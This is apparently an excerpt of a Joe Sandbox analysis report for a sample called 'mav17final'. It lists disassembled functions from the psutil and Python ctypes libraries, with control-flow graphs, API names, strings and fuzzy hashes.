                                                  • String ID: NtQuerySystemInformation (no PID found)$NtQuerySystemInformation(SystemProcessInformation)
                                                  • API String ID: 3562636166-1914444273
                                                  • Opcode ID: 427dc0625ceb9ddaa0afee0601954c2752e9c2a249e2768820022e836a42a8a8
                                                  • Instruction ID: e8720a6a730c14fef2e45fe8a3c14b4a4055ccb6e6fe28417cc663517a4f65d7
                                                  • Opcode Fuzzy Hash: 427dc0625ceb9ddaa0afee0601954c2752e9c2a249e2768820022e836a42a8a8
                                                  • Instruction Fuzzy Hash: 0B312331A0D6C282FF548F19A4506796BE1FFA8BE4F145435EB4E877A4DE3DE4828710
                                                  Function 00007FF8B9071270 Relevance: 4.5, APIs: 3, Instructions: 37libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID:
                                                  • API String ID: 145871493-0
                                                  • Opcode ID: c4961b64c7e64f6e4fbbe085665ff08e943201d771d0e41144107d4a87dedda4
                                                  • Instruction ID: 56e26c6fe6311b3daf6eb81b7e5572e1518195ebf59956193f5dd1e91bc63355
                                                  • Opcode Fuzzy Hash: c4961b64c7e64f6e4fbbe085665ff08e943201d771d0e41144107d4a87dedda4
                                                  • Instruction Fuzzy Hash: 2201F420B0DAC181EE549F66B94813E6761AF68FE4B184434DF4E87B54DE3CD4578700
                                                  Function 00007FF8B9071380 Relevance: 66.7, APIs: 14, Strings: 24, Instructions: 229libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 120 7ff8b9071380-7ff8b90713af LoadLibraryA 123 7ff8b90713c2-7ff8b90713d5 GetProcAddress 120->123 124 7ff8b90713b1-7ff8b90713c0 120->124 125 7ff8b9071408-7ff8b907141f GetModuleHandleA 123->125 126 7ff8b90713d7-7ff8b90713e9 FreeLibrary 123->126 132 7ff8b90713ef-7ff8b90713f1 124->132 128 7ff8b907142a-7ff8b907143d GetProcAddress 125->128 129 7ff8b9071421-7ff8b9071428 125->129 126->132 130 7ff8b907143f 128->130 131 7ff8b9071467-7ff8b907147e GetModuleHandleA 128->131 134 7ff8b9071446-7ff8b9071466 129->134 130->134 135 7ff8b9071489-7ff8b907149c GetProcAddress 131->135 136 7ff8b9071480-7ff8b9071487 131->136 137 7ff8b90713f8-7ff8b9071407 132->137 140 7ff8b907149e 135->140 141 7ff8b90714c6-7ff8b90714f2 LoadLibraryA 135->141 139 7ff8b90714a5-7ff8b90714c5 136->139 140->139 145 7ff8b907151a-7ff8b907152d GetProcAddress 141->145 146 7ff8b90714f4-7ff8b9071519 141->146 147 7ff8b907152f-7ff8b907155f FreeLibrary 145->147 148 7ff8b9071560-7ff8b9071584 call 7ff8b9071270 145->148 148->137 153 7ff8b907158a-7ff8b90715a7 call 7ff8b9071270 148->153 153->137 156 7ff8b90715ad-7ff8b90715ca call 7ff8b9071270 153->156 156->137 159 7ff8b90715d0-7ff8b90715ed call 7ff8b9071270 156->159 159->137 162 7ff8b90715f3-7ff8b9071610 call 7ff8b9071270 159->162 162->137 165 7ff8b9071616-7ff8b9071633 call 7ff8b9071270 162->165 165->137 168 7ff8b9071639-7ff8b9071656 call 7ff8b9071270 165->168 168->137 171 7ff8b907165c-7ff8b9071679 call 7ff8b9071270 168->171 171->137 174 7ff8b907167f-7ff8b907168f GetModuleHandleA 171->174 175 7ff8b907169a-7ff8b90716ad GetProcAddress 174->175 176 7ff8b9071691-7ff8b9071698 174->176 178 7ff8b90716af 175->178 179 7ff8b90716d7-7ff8b90716fb call 7ff8b9071270 175->179 177 7ff8b90716b6-7ff8b90716d6 176->177 178->177 179->137 183 7ff8b9071701-7ff8b9071711 GetModuleHandleA 179->183 184 7ff8b907171c-7ff8b907172f GetProcAddress 183->184 185 7ff8b9071713-7ff8b907171a 183->185 187 7ff8b9071742-7ff8b9071771 call 7ff8b9071270 * 2 184->187 188 7ff8b9071731 184->188 186 7ff8b9071738-7ff8b9071740 185->186 186->187 193 7ff8b9071776-7ff8b90717c3 call 7ff8b9071270 * 2 187->193 188->186
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryProc$FreeHandleLoadModule
                                                  • String ID: GetActiveProcessorCount$GetExtendedTcpTable$GetExtendedUdpTable$GetLogicalProcessorInformationEx$GetTickCount64$NtQueryInformationProcess$NtQueryObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtResumeProcess$NtSetInformationProcess$NtSuspendProcess$RtlGetVersion$RtlIpv4AddressToStringA$RtlIpv6AddressToStringA$RtlNtStatusToDosErrorNoTeb$WTSEnumerateSessionsW$WTSFreeMemory$WTSQuerySessionInformationW$iphlpapi.dll$kernel32$ntdll$ntdll.dll$wtsapi32.dll
                                                  • API String ID: 3023338733-761253638
                                                  • Opcode ID: 40eaee2ffd6f01f50de0b2aac545704ad0fe2f6a6e437eb824291176764a6811
                                                  • Instruction ID: 364af58f0c1f907db20adf2747ae927ab553415c2572c77388e22d324298fc69
                                                  • Opcode Fuzzy Hash: 40eaee2ffd6f01f50de0b2aac545704ad0fe2f6a6e437eb824291176764a6811
                                                  • Instruction Fuzzy Hash: DDC1D460A09A8791EE849F2CF8851B52BE1BF687E4B848135C70D466A1EF7CE59BC300
                                                  Function 00007FF8B9F63BF0 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 181threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 199 7ff8b9f63bf0-7ff8b9f63c39 200 7ff8b9f63c3f-7ff8b9f63c5c ffi_prep_cif 199->200 201 7ff8b9f6870a-7ff8b9f68711 199->201 202 7ff8b9f68713 200->202 203 7ff8b9f63c62-7ff8b9f63c65 200->203 204 7ff8b9f6871a-7ff8b9f68721 201->204 202->204 205 7ff8b9f6874f-7ff8b9f68764 call 7ff8b9f6d5f8 203->205 206 7ff8b9f63c6b-7ff8b9f63c74 203->206 207 7ff8b9f68731-7ff8b9f6873a PyErr_SetString 204->207 208 7ff8b9f68745 205->208 215 7ff8b9f68766 205->215 210 7ff8b9f63c7a-7ff8b9f63c8e 206->210 211 7ff8b9f63d41-7ff8b9f63d4a PyEval_SaveThread 206->211 207->208 208->205 213 7ff8b9f6876b-7ff8b9f68789 _errno * 2 210->213 214 7ff8b9f63c94-7ff8b9f63c9e 210->214 211->210 216 7ff8b9f68796-7ff8b9f687b4 GetLastError SetLastError 213->216 214->216 217 7ff8b9f63ca4-7ff8b9f63cc5 ffi_call 214->217 215->213 220 7ff8b9f687c1-7ff8b9f687d5 GetLastError SetLastError 216->220 218 7ff8b9f63ce9-7ff8b9f63cf0 217->218 219 7ff8b9f63cf6-7ff8b9f63cf9 218->219 218->220 221 7ff8b9f63cff-7ff8b9f63d01 219->221 222 7ff8b9f687db-7ff8b9f687ed _errno * 2 219->222 220->222 223 7ff8b9f63d4f-7ff8b9f63d58 PyEval_RestoreThread 221->223 224 7ff8b9f63d03-7ff8b9f63d06 221->224 225 7ff8b9f687f4-7ff8b9f687f9 222->225 223->224 224->225 226 7ff8b9f63d0c-7ff8b9f63d0f 224->226 225->226 227 7ff8b9f687ff-7ff8b9f68809 _Py_Dealloc 225->227 228 7ff8b9f6880e-7ff8b9f68827 PySys_Audit 226->228 229 7ff8b9f63d15-7ff8b9f63d17 226->229 227->226 228->208 230 7ff8b9f6882d-7ff8b9f68834 228->230 231 7ff8b9f63d19-7ff8b9f63d22 PyErr_Occurred 229->231 232 7ff8b9f63d5a-7ff8b9f63d5c 229->232 233 7ff8b9f68836 230->233 234 7ff8b9f688b4-7ff8b9f688c0 230->234 235 7ff8b9f63d24-7ff8b9f63d40 231->235 232->235 236 7ff8b9f68838-7ff8b9f6883f 233->236 237 7ff8b9f68873-7ff8b9f6888e 233->237 238 7ff8b9f6873c-7ff8b9f6873f PyErr_SetFromWindowsErr 234->238 239 7ff8b9f688c6-7ff8b9f688dc 234->239 240 7ff8b9f68867 236->240 241 7ff8b9f68841-7ff8b9f68848 236->241 242 7ff8b9f688a2-7ff8b9f688af PyErr_Format 237->242 243 7ff8b9f68890-7ff8b9f6889d PyErr_Format 237->243 238->208 240->237 244 7ff8b9f6884e-7ff8b9f68855 241->244 245 7ff8b9f68723 241->245 242->208 243->208 244->238 246 7ff8b9f6885b-7ff8b9f68862 244->246 247 7ff8b9f6872a 245->247 246->247 247->207
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$_errno$Eval_FromOccurredSaveStringThreadWindowsffi_callffi_prep_cif
                                                  • String ID: No ffi_type for result$ctypes.seh_exception$exception: access violation reading %p$exception: access violation writing %p$exception: breakpoint encountered$exception: datatype misalignment$exception: single step$ffi_prep_cif failed
                                                  • API String ID: 1937973484-2749438402
                                                  • Opcode ID: 430c0edaa122ef19808d40242a936452debd4f228559f93505334d9254383600
                                                  • Instruction ID: d12de5b110c7a1d880a6d5543bcc066dd4d4aeaa1f2bc7f1058f52d8215207db
                                                  • Opcode Fuzzy Hash: 430c0edaa122ef19808d40242a936452debd4f228559f93505334d9254383600
                                                  • Instruction Fuzzy Hash: B6813D32A08BC286E660CF19E8446B96BA1FF45BE6F546039DB5E437A4DF7CE844C700
                                                  Function 00007FF8B9077ED0 Relevance: 45.6, APIs: 16, Strings: 10, Instructions: 142COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$ErrorLast$CloseCodeExitHandleProcess
                                                  • String ID: GetExitCodeProcess$GetExitCodeProcess != STILL_ACTIVE$GetExitCodeProcess -> ERROR_ACCESS_DENIED (ignored)$OpenProcess$OpenProcess -> ERROR_INVALID_PARAMETER$OpenProcess -> ERROR_SUCCESS$OpenProcess -> ERROR_SUCCESS turned into AD$OpenProcess -> ERROR_SUCCESS turned into NSP$psutil-debug [%s:%d]> $psutil/arch/windows/process_utils.c
                                                  • API String ID: 4173993794-1769976570
                                                  • Opcode ID: 4917832fdb2819dc7055f8de02272ff85822ed9d623a28d87c67c9903ffe2f2a
                                                  • Instruction ID: 2900b5f4ea75f70ce33d6012e45db69dbf4abf3023f45c6b758f4ea652b2ee58
                                                  • Opcode Fuzzy Hash: 4917832fdb2819dc7055f8de02272ff85822ed9d623a28d87c67c9903ffe2f2a
                                                  • Instruction Fuzzy Hash: D5512C20F1D5C692EF959F2DF8952B92AA1AF647F0F445036DB0E422A6DE2CE487C350
                                                  Function 00007FF8B9F626C0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 191COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 386 7ff8b9f626c0-7ff8b9f626f7 call 7ff8b9f62870 389 7ff8b9f626fd-7ff8b9f62704 386->389 390 7ff8b9f62831 386->390 391 7ff8b9f6283d 389->391 392 7ff8b9f6270a-7ff8b9f62714 389->392 390->391 395 7ff8b9f62849 391->395 393 7ff8b9f6271d-7ff8b9f62724 392->393 394 7ff8b9f62716 392->394 393->395 396 7ff8b9f6272a-7ff8b9f62744 393->396 394->393 400 7ff8b9f62855-7ff8b9f62858 395->400 397 7ff8b9f673ca-7ff8b9f673e0 PyTuple_GetItem 396->397 398 7ff8b9f6274a-7ff8b9f62787 call 7ff8b9f628f0 396->398 401 7ff8b9f6744f-7ff8b9f67460 call 7ff8b9f63d98 397->401 402 7ff8b9f673e2-7ff8b9f673e9 397->402 409 7ff8b9f6278d-7ff8b9f62790 398->409 410 7ff8b9f67448-7ff8b9f6744a 398->410 405 7ff8b9f6285e-7ff8b9f674e2 400->405 406 7ff8b9f627b6-7ff8b9f627e3 call 7ff8b9f62980 400->406 413 7ff8b9f67480-7ff8b9f6748f 401->413 414 7ff8b9f67462-7ff8b9f67479 PyErr_SetString 401->414 407 7ff8b9f673f2-7ff8b9f67402 PyErr_SetString 402->407 417 7ff8b9f674f4-7ff8b9f674fb 405->417 418 7ff8b9f674e4-7ff8b9f674ed _Py_Dealloc 405->418 416 7ff8b9f627e8-7ff8b9f627ee 406->416 407->410 409->406 415 7ff8b9f62792-7ff8b9f627a7 409->415 419 7ff8b9f67491-7ff8b9f6749c 413->419 420 7ff8b9f674c3-7ff8b9f674ca 413->420 414->413 415->400 421 7ff8b9f627ad-7ff8b9f627b0 415->421 422 7ff8b9f627f9-7ff8b9f62814 call 7ff8b9f62894 416->422 423 7ff8b9f627f0-7ff8b9f627f3 416->423 424 7ff8b9f6741b-7ff8b9f67442 PyErr_Format 417->424 418->417 419->420 425 7ff8b9f6749e-7ff8b9f674a4 419->425 420->407 421->406 426 7ff8b9f674cf-7ff8b9f674d3 421->426 435 7ff8b9f62819-7ff8b9f62830 422->435 423->422 427 7ff8b9f67500-7ff8b9f67521 PyObject_CallFunctionObjArgs 423->427 424->410 431 7ff8b9f673eb 425->431 432 7ff8b9f674aa-7ff8b9f674b9 425->432 433 7ff8b9f674d9 _Py_Dealloc 426->433 434 7ff8b9f67414 426->434 429 7ff8b9f67541-7ff8b9f67545 427->429 430 7ff8b9f67523-7ff8b9f67526 427->430 437 7ff8b9f67547-7ff8b9f6754a _Py_Dealloc 429->437 438 7ff8b9f67550-7ff8b9f67554 429->438 430->429 436 7ff8b9f67528-7ff8b9f6752c 430->436 431->407 432->420 433->434 434->424 436->422 440 7ff8b9f67532-7ff8b9f6753c _Py_Dealloc 436->440 437->438 441 7ff8b9f6755f-7ff8b9f67562 438->441 442 7ff8b9f67556-7ff8b9f67559 _Py_Dealloc 438->442 440->422 441->435 442->441
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: COM method call without VTable$Expected a COM this pointer as first argument$NULL COM pointer access$native com method call without 'this' parameter$this function takes %d argument%s (%d given)$this function takes at least %d argument%s (%d given)
                                                  • API String ID: 0-1981512665
                                                  • Opcode ID: f07b7bceabcce526c4a62d906a5ec0dd6d9bc262e596e910abc21d3a49bdda52
                                                  • Instruction ID: 137ffe4d8d7656e15f6e93c0bf76187713e4c57036b74e94c9b0cab4bba2e1f1
                                                  • Opcode Fuzzy Hash: f07b7bceabcce526c4a62d906a5ec0dd6d9bc262e596e910abc21d3a49bdda52
                                                  • Instruction Fuzzy Hash: CE912926A09BC281EA60CF29E4442B96BA0FF85BE6F546436DF4D47768DF3CE545C700
                                                  Function 00007FF8B9071E60 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 115timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseErrorHandleLastProcess$OpenTimes
                                                  • String ID: (ddd)$GetProcessTimes -> ERROR_ACCESS_DENIED$OpenProcess$automatically set for PID 0
                                                  • API String ID: 439304258-3215740380
                                                  • Opcode ID: b3043431e4184d2c3639cdfc297f2aa77ef6b2bf120e7a198ebdad43fd7f5465
                                                  • Instruction ID: 891e2cc6381b688220f143595c9d416779fddddca7caf2a81f85ab76a1ca2acb
                                                  • Opcode Fuzzy Hash: b3043431e4184d2c3639cdfc297f2aa77ef6b2bf120e7a198ebdad43fd7f5465
                                                  • Instruction Fuzzy Hash: 1B416531B1DAC686EE41DF3DA840579A7A6BFA47E0F448231EB1F52695EF3CE4468700
                                                  Function 00007FF8B9F62980 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 249COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 469 7ff8b9f62980-7ff8b9f629dc 470 7ff8b9f6791e 469->470 471 7ff8b9f629e2-7ff8b9f629e9 469->471 473 7ff8b9f67926-7ff8b9f67943 PyErr_Format 470->473 472 7ff8b9f629ef-7ff8b9f62a08 471->472 471->473 474 7ff8b9f62a0d-7ff8b9f62a36 call 7ff8b9f666f0 memset 472->474 475 7ff8b9f62a0a 472->475 477 7ff8b9f6794a 473->477 474->477 479 7ff8b9f62a3c-7ff8b9f62a47 474->479 475->474 480 7ff8b9f67952-7ff8b9f67964 477->480 479->480 481 7ff8b9f62a4d-7ff8b9f62a56 479->481 484 7ff8b9f6796d-7ff8b9f67973 _Py_Dealloc 480->484 482 7ff8b9f62a58-7ff8b9f62a62 481->482 483 7ff8b9f62ad3-7ff8b9f62ae1 481->483 487 7ff8b9f62a65-7ff8b9f62a68 482->487 485 7ff8b9f67999 483->485 486 7ff8b9f62ae7-7ff8b9f62af9 call 7ff8b9f62d8c 483->486 491 7ff8b9f6797b-7ff8b9f6797f 484->491 492 7ff8b9f679a5 485->492 497 7ff8b9f62afb 486->497 498 7ff8b9f62b00-7ff8b9f62b11 486->498 489 7ff8b9f62a6e-7ff8b9f62a71 487->489 490 7ff8b9f62c78-7ff8b9f62c87 call 7ff8b9f62c90 487->490 489->490 494 7ff8b9f62a77-7ff8b9f62a8b PyObject_CallOneArg 489->494 509 7ff8b9f62c8c-7ff8b9f62c8e 490->509 495 7ff8b9f67984-7ff8b9f67997 call 7ff8b9f6d4a0 491->495 503 7ff8b9f679ad-7ff8b9f679b4 492->503 499 7ff8b9f67981 494->499 500 7ff8b9f62a91-7ff8b9f62aaa call 7ff8b9f62c90 494->500 508 7ff8b9f679f7-7ff8b9f679fb 495->508 497->498 504 7ff8b9f62b16-7ff8b9f62b36 call 7ff8b9f666f0 498->504 505 7ff8b9f62b13 498->505 499->495 500->484 516 7ff8b9f62ab0-7ff8b9f62ab3 500->516 510 7ff8b9f679ba-7ff8b9f679bf 503->510 511 7ff8b9f62c00-7ff8b9f62c03 503->511 527 7ff8b9f62b38 504->527 528 7ff8b9f62b3b-7ff8b9f62b53 call 7ff8b9f666f0 504->528 505->504 517 7ff8b9f62c1e-7ff8b9f62c21 509->517 518 7ff8b9f679c1-7ff8b9f679c9 call 7ff8b9f6d0a8 510->518 519 7ff8b9f679e3-7ff8b9f679ec PyLong_FromLong 510->519 514 7ff8b9f679ce-7ff8b9f679d3 511->514 515 7ff8b9f62c09-7ff8b9f62c1b call 7ff8b9f62600 511->515 514->519 526 7ff8b9f679d5-7ff8b9f679de PyErr_SetFromWindowsErr 514->526 515->517 516->491 522 7ff8b9f62ab9-7ff8b9f62acb 516->522 523 7ff8b9f62c46-7ff8b9f62c77 call 7ff8b9f65930 517->523 524 7ff8b9f62c23 517->524 518->517 519->517 522->483 530 7ff8b9f62acd-7ff8b9f62ad1 522->530 531 7ff8b9f62c28-7ff8b9f62c2e 524->531 526->517 527->528 539 7ff8b9f62b58-7ff8b9f62b6c call 7ff8b9f666f0 528->539 540 7ff8b9f62b55 528->540 530->487 536 7ff8b9f62c3c-7ff8b9f62c44 531->536 537 7ff8b9f62c30-7ff8b9f62c34 531->537 536->523 536->531 537->536 541 7ff8b9f62c36 _Py_Dealloc 537->541 544 7ff8b9f679f1 PyErr_NoMemory 539->544 545 7ff8b9f62b72-7ff8b9f62b75 539->545 540->539 541->536 544->508 545->544 546 7ff8b9f62b7b-7ff8b9f62b7e 545->546 546->544 547 7ff8b9f62b84-7ff8b9f62b8b 546->547 548 7ff8b9f62b8d-7ff8b9f62b9b 547->548 549 7ff8b9f62bc5-7ff8b9f62be5 call 7ff8b9f63bf0 547->549 550 7ff8b9f62b9e-7ff8b9f62bab 548->550 553 7ff8b9f62bea-7ff8b9f62bed 549->553 550->492 552 7ff8b9f62bb1-7ff8b9f62bc3 550->552 552->549 552->550 553->509 554 7ff8b9f62bf3-7ff8b9f62bfa 553->554 554->503 554->511
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CallDeallocErr_FormatObject_memset
                                                  • String ID: argument %zd: $too many arguments (%zi), maximum is %i
                                                  • API String ID: 1791410686-4072972272
                                                  • Opcode ID: 4740f729d07df1b72c89f8ee573bc102a3c799c06bb822e8bf3e008f4163d2c1
                                                  • Instruction ID: f04de0b2ed425f53fcd88e79a5a167f38f6ff8eec3994a4ed635220ba52b13ae
                                                  • Opcode Fuzzy Hash: 4740f729d07df1b72c89f8ee573bc102a3c799c06bb822e8bf3e008f4163d2c1
                                                  • Instruction Fuzzy Hash: 2DB16F62A09BC285EA649F29D8402B923A0FF06BF9F546631DB6D977D9DF3CE541C300
                                                  Function 00007FF8B9077D80 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 86COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • K32EnumProcesses.KERNEL32(?,?,?,?,?,?,00000000,00007FF8B9078203,?,?,?,00007FF8B9071966), ref: 00007FF8B9077DD5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: EnumProcesses
                                                  • String ID: psutil-debug [%s:%d]> $psutil/arch/windows/process_utils.c$psutil_get_pids() failed
                                                  • API String ID: 84517404-721664742
                                                  • Opcode ID: 496f7af1095e9932f3dca6ae4bfd7e75e1a19dd7a4ce45f1e72747e8913e23f5
                                                  • Instruction ID: cc6cf918d975103c323afe4401c1015d6f919029e2be6f35bb6477f1348ef8eb
                                                  • Opcode Fuzzy Hash: 496f7af1095e9932f3dca6ae4bfd7e75e1a19dd7a4ce45f1e72747e8913e23f5
                                                  • Instruction Fuzzy Hash: 15316521B096C682EF549F2DE4552756A61BFA8BE1F544036DB0E073A0DE7CE8868350
                                                  Function 00007FF8B9074AC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 668 7ff8b9074ac0-7ff8b9074adb GetSystemTimes 669 7ff8b9074aec-7ff8b9074b8c 668->669 670 7ff8b9074add-7ff8b9074aeb 668->670
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: SystemTimes
                                                  • String ID: (ddd)
                                                  • API String ID: 375623090-2401937087
                                                  • Opcode ID: 29ec311d8e1ff67191919b1209f01c79c48eb70a1fab8fecc3dbe41d73d0aba0
                                                  • Instruction ID: 5fabdd11cf6ed3dd916b45cfb64d5fe5683d514f0be5c7a0fa41d6de714ef9eb
                                                  • Opcode Fuzzy Hash: 29ec311d8e1ff67191919b1209f01c79c48eb70a1fab8fecc3dbe41d73d0aba0
                                                  • Instruction Fuzzy Hash: 21116A31A29E814FC553DB399990525E796AFA57D4B548322F50FF1D50E72CE0978B00
                                                  Function 00007FF8B9077CD0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
